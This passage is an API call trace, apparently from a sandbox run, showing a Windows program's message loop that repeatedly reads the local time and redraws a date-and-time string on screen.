wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0xdd)) [0131.481] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0131.511] TranslateMessage (lpMsg=0x2347a14) returned 0 [0131.511] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0131.511] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0xfc)) [0131.511] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0xff)) [0131.515] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0131.532] TranslateMessage (lpMsg=0x2347a14) returned 0 [0131.532] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0131.532] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x111)) [0131.532] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x111)) [0131.532] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0131.541] TranslateMessage (lpMsg=0x2347a14) returned 0 [0131.541] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0131.541] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x11a)) [0131.542] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x11a)) [0131.542] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0131.570] TranslateMessage (lpMsg=0x2347a14) returned 0 [0131.570] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0131.570] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x137)) [0131.570] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x137)) [0131.571] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0131.578] TranslateMessage (lpMsg=0x2347a14) returned 0 [0131.578] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0131.578] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x13f)) [0131.578] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x13f)) [0131.579] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0131.589] TranslateMessage (lpMsg=0x2347a14) returned 0 [0131.589] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0131.589] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x14a)) [0131.589] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x14a)) [0131.589] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0131.612] TranslateMessage (lpMsg=0x2347a14) returned 0 [0131.612] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0131.612] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x161)) [0131.612] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x161)) [0131.612] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0131.626] TranslateMessage (lpMsg=0x2347a14) returned 0 [0131.626] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0131.627] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x16f)) [0131.627] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x16f)) [0131.627] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0131.636] TranslateMessage (lpMsg=0x2347a14) returned 0 [0131.636] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0131.636] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x179)) [0131.637] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x179)) [0131.637] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0131.663] TranslateMessage (lpMsg=0x2347a14) returned 0 [0131.670] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0131.670] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x19a)) [0131.670] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x19c)) [0131.671] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0131.671] TranslateMessage (lpMsg=0x2347a14) returned 0 [0131.671] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0131.672] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x19c)) [0131.672] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x1a2)) [0131.677] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0131.693] TranslateMessage (lpMsg=0x2347a14) returned 0 [0131.695] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0131.703] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x1bc)) [0131.704] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x1bc)) [0131.704] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0131.704] TranslateMessage (lpMsg=0x2347a14) returned 0 [0131.704] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0131.704] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x1bc)) [0131.704] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x1bc)) [0131.704] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0131.716] TranslateMessage (lpMsg=0x2347a14) returned 0 [0131.716] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0131.716] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x1c9)) [0131.716] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x1c9)) [0131.716] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0131.738] TranslateMessage (lpMsg=0x2347a14) returned 0 [0131.738] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0131.738] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x1e0)) [0131.739] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x1e0)) [0131.739] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0131.762] TranslateMessage (lpMsg=0x2347a14) returned 0 [0131.762] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0131.762] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x1f7)) [0131.762] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x1f7)) [0131.763] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0131.778] TranslateMessage (lpMsg=0x2347a14) returned 0 [0131.778] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0131.778] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x207)) [0131.778] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x207)) [0131.779] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0131.887] TranslateMessage (lpMsg=0x2347a14) returned 0 [0131.887] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0131.887] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x274)) [0131.888] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x274)) [0131.888] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0131.889] TranslateMessage (lpMsg=0x2347a14) returned 0 [0131.889] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0131.890] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x276)) [0131.890] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x276)) [0131.890] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0131.939] TranslateMessage (lpMsg=0x2347a14) returned 0 [0131.940] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0131.940] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x2a8)) [0131.940] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x2a9)) [0131.940] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0131.965] TranslateMessage (lpMsg=0x2347a14) returned 0 [0131.965] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0131.965] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x2c1)) [0131.965] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x2c1)) [0131.965] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0132.024] TranslateMessage (lpMsg=0x2347a14) returned 0 [0132.024] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0132.024] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x2fd)) [0132.025] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x2fd)) [0132.025] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0132.026] TranslateMessage (lpMsg=0x2347a14) returned 0 [0132.026] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0132.027] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x300)) [0132.027] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x1, wMilliseconds=0x301)) [0132.028] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0133.778] TranslateMessage (lpMsg=0x2347a14) returned 0 [0133.778] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0133.778] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x207)) [0133.778] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x207)) [0133.778] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0133.778] GetDC (hWnd=0x0) returned 0xa0100d0 [0133.779] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0133.779] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0133.779] GetSysColor (nIndex=8) returned 0x0 [0133.779] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0133.779] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0133.779] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0133.779] UnrealizeObject (h=0x2d10099f) returned 1 [0133.779] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0133.779] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0133.779] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0133.779] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:50:03 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:50:03 PM", lprc=0x19f5bd) returned 13 [0133.779] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0133.780] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0133.780] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0133.780] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0133.780] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0133.780] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0133.782] TranslateMessage (lpMsg=0x2347a14) returned 0 [0133.782] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0133.782] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x20b)) [0133.782] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x20b)) [0133.783] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0133.794] TranslateMessage (lpMsg=0x2347a14) returned 0 [0133.794] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0133.794] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x217)) [0133.794] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x217)) [0133.794] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0133.814] TranslateMessage (lpMsg=0x2347a14) returned 0 [0133.814] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0133.814] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x22a)) [0133.814] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x22a)) [0133.814] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0133.824] TranslateMessage (lpMsg=0x2347a14) returned 0 [0133.824] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0133.824] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x235)) [0133.824] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x235)) [0133.825] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0133.845] TranslateMessage (lpMsg=0x2347a14) returned 0 [0133.845] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0133.845] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x24a)) [0133.845] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x24a)) [0133.846] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0133.856] TranslateMessage (lpMsg=0x2347a14) returned 0 [0133.856] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0133.857] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x255)) [0133.857] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x255)) [0133.857] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0133.883] TranslateMessage (lpMsg=0x2347a14) returned 0 [0133.883] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0133.883] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x270)) [0133.883] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x270)) [0133.883] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0133.889] TranslateMessage (lpMsg=0x2347a14) returned 0 [0133.889] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0133.889] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x276)) [0133.890] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x276)) [0133.890] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0133.900] TranslateMessage (lpMsg=0x2347a14) returned 0 [0133.900] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0133.900] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x281)) [0133.901] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x281)) [0133.901] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0133.922] TranslateMessage (lpMsg=0x2347a14) returned 0 [0133.922] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0133.922] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x297)) [0133.922] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x3, wMilliseconds=0x297)) [0133.923] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0133.935] TranslateMessage (lpMsg=0x2347a14) returned 0 [0133.935] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0133.935] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, 